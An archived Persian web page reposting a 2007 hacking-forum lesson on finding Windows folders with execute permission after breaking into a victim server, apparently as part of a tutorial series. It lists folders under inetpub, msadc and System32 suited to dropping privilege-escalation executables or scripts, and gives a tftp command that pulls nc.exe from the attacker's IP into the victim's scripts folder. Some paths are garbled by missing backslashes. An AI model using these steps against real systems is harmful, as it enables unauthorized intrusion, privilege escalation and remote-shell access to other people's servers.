تبلیغات
تبلیغات متنی
محبوبترینها
معرفی و فروش بوته گرافیتی ریخته گری
بهترین بروکر برای معاملات فارکس در سال 2024
تجربه رانندگی با لندکروز در جزیره قشم؛ لوکسترین انتخاب
اکسپرتاپ: 10 شغل پردرآمد برای مهاجران کاری در کانادا
بهترین سایتهای خرید تیک آبی رسمی اینستاگرام در ایران
کدام رنگ کاغذ دیواری مناسب فضای شماست؟
چه چیزهایی دیگر در دکوراسیون مد نیست؟!
بررسی قیمت تیرچه + قیمت تیرچه کرومیت + قیمت یونولیت
خرید و قیمت ورق در مشاوران آهن + [مشاوره رایگان]
صفحه اول
آرشیو مطالب
ورود/عضویت
هواشناسی
قیمت طلا سکه و ارز
قیمت خودرو
مطالب در سایت شما
تبادل لینک
ارتباط با ما
مطالب سایت سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون
مطالب سایت سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون
آمار وبسایت
تعداد کل بازدیدها :
1813264137
فولدرهايي از ويندوز با مجوز اجرا
واضح آرشیو وب فارسی:سایت ریسک: imanirani12th August 2007, 11:39 PM- فولدرهايي از ويندوز با مجوز اجرا فرض کنيد که الان از طريق روشي توانستيد مجوز ايجاد يا کپي کردن فايلي رو در تعدادي از فولدرهاي ويندوز قرباني بدست بياوريد. در اين گونه موارد هدف اينه که فولدري رو پيدا کنيم که براي ما با مجوزي که الان داريم (مثلا guest )، اجازه اجرا ( execute ) رو بده. دليلش مشخصه، مثلا اگه الان با guest وارد شديد، ممکن است بخواهيد که به سطح Admin برسيد. اين کار ممکنه با دستورات خود ويندوز ممکن نباشه و شما مجبور شويد که يه فايل اجرايي رو به کامپيوتر قرباني کپي کنيد تا با اجراي اون شما از guest به Admin برسيد. حالا اگه اين فايل خلافکار! رو به فولدري کپي کنيد که مجوز اجرا رو براي اکانت شما نداشته باشه، عملا نميتونيد از اون فايل استفاده کنيد. افتاد؟ درس قبلي يک سري ابزار از NTRK معرفي کردم که اسمشون ابزارهاي بررسي مجوزهاي NTFS بود ( از جمله perms و showacls ). از اينها هم در اين مرحله نميتونيد استفاده کنيد. اگه گفتيد چرا؟ درسته! چون اينها هم به هر حال يک سري ابزار و نرمافزار خارجي هستند ( يعني به طور پيشفرض در خود ويندوز وجود ندارند ) و از طرف ديگه ابزارهاي لوکال هستند ( يعني براي استفاده بايد به کامپيوتر قرباني کپي شوند ) و واضحه که بايد به فولدري کپي بشوند که مجوز اجرا داشته باشه و چون من نميدونم کدوم فولدر مجوز اجرا داره، نميتونم از اينها استفاده کنم! ( اين ابزارها هم کاربردهايي دارند که گاه خيلي مهمه، عجله نکنيد! ) خوب حالا من چکار ميتونم بکنم؟ روش اول کوشش و خطاست. اين بدترين راه و گاه موثرترين راه حل است! يعني مثلا يه فايل کوچک رو تو فولدرهاي مختلف کپي کنم و ببينم که کدومشو ميتونم اجرا کنم ( يعني کدوم فولدر به اون فايل اجازه اجرا ميده ). اين روش نيازي به توضيح نداره چون ايرانيها خداي اين کاران :) روش بهتر اينه که من با دانشي که دارم بدونم که معمولا چه فولدرهايي مجوز اجرا رو به من ميدهند. که الان ميخوام اينو بگم: ۱- اگه با يک باگ مربوط به IIS به شل دست يافتهايد، معمولا يکي از اينها رو انتخاب کنيد: ?:inetpubscripts?:program filescommon filessystemmsadcمنظور از (؟) در موارد بالا اينه که ممکنه که فولدر مربوطه در هر درايوي باشه ( مثلا درايو C يا D و...) و ممکنه لازم باشه يه کم بگرديد که پيداش کنيد. نکته بعدي اينه که فولدرهايي که گفتم اين اجازه رو ميدن که هم فايل اجرايي ( با پسوند exe ) و هم اسکريپتها ( مثل asp و ... ) در اونا بذاريم و اجرا کنيم. دقت کنيد که خيلي کارها رو ميشه بدون کمک فايل اجرايي ( فايل خرابکار ) انجام داد. مثلا اگه قرار باشه صفحه اول سايتي عوض بشه، اين کار رو گاه ميشه با اسکريپتها هم انجام داد. بنابراين اين پايين ليست فوادرهايي رو براتون ميگم که فقط اجازه اجراي اسکريپت رو ميدهند ( نه اجراي فايل اجرايي! ) : ?:winnthelpiishelp?:inetpubiissamples%SystemR oot%System32inetsrviisadmin%SystemRoot%System3 2inetsrviisadmpwd%SystemRoot%webprintersتوض يح لازم اينه که وقتي ميگم %SystemRoot% منظور همون فولدري است که ويندوز در اون نصب شده، بنابراين ميتونه مثلا C:WINNT باشه يا H:WINDOWS باشه و يا هر چيز ديگه. ما از همون عبارت %SystemRoot% که استفاده کنيم خودش ما رو ميبره همونجا ! حالا چرا باگهاي IIS رو جدا کردم؟ دليلش اينه که بعضي از اين باگها وقتي ازشون سوءاستفاده بشه، به ما اختياراتي در حد IUSR_xxxxx-yyyyy ميده ( که قبل گفتم اين چيه ) و اختيارات در حد Admin نيست. بنابراين از اين فولدرهاي خاص استفاده کرديم. ۲- اگه با باگهاي غير از IIS به شل دست پيدا کرديد، انتخاب فولدر درست معمولا بستگي به اين داره که چه سرويس ( و پورتي ) رو exploit کردهايم و به چه اکانتي دست پيدا کردهايم. اگه دسترسي ما کامل باشه ( يعني در حد Admin باشه ) بهترين فولدر براي قرار دادن و اجراي فايلهاي اجرايي اين فولدرهاست: %SystemRoot%%SystemRoot%system32اگه با اکانتي که بدست آوردهايد به اين فولدرها دسترسي نداريد ( مثلا از طريق NetBIOS با يک اکانت محدود وارد شدهايد ) بهتره همون روش ايراني! ( کوشش و خطا ) رو پيش بگيريد. آخرين نکتهاي که بايد اينجا بگم، اينه که وقتي ميخواين از طريق tftp فايل اجرايي رو بفرستيد روي اون فولدر خاص، بايد آدرس فولدر رو هم آخر دستور مربوط به tftp بنويسيد. مثلا اگر IP ما در اين لحظه 217.66.198.116 باشه، و بخوام فايل nc.exe رو بفرستم به فولدر c:inetpubscripts بايد بنويسم: tftp -i 217.66.198.116 GET nc.exe c:interpubscripts c.exeيعني وقتي سرور قرباني فايل رو ميگيره، اونو تو اين فولدر که مشخص کردم قرار بده ( و نه فولدر فعلي ). سایت ما را در گوگل محبوب کنید با کلیک روی دکمه ای که در سمت چپ این منو با عنوان +1 قرار داده شده شما به این سایت مهر تأیید میزنید و به دوستانتان در صفحه جستجوی گوگل دیدن این سایت را پیشنهاد میکنید که این امر خود باعث افزایش رتبه سایت در گوگل میشود
این صفحه را در گوگل محبوب کنید
[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 378]
-
گوناگون
پربازدیدترینها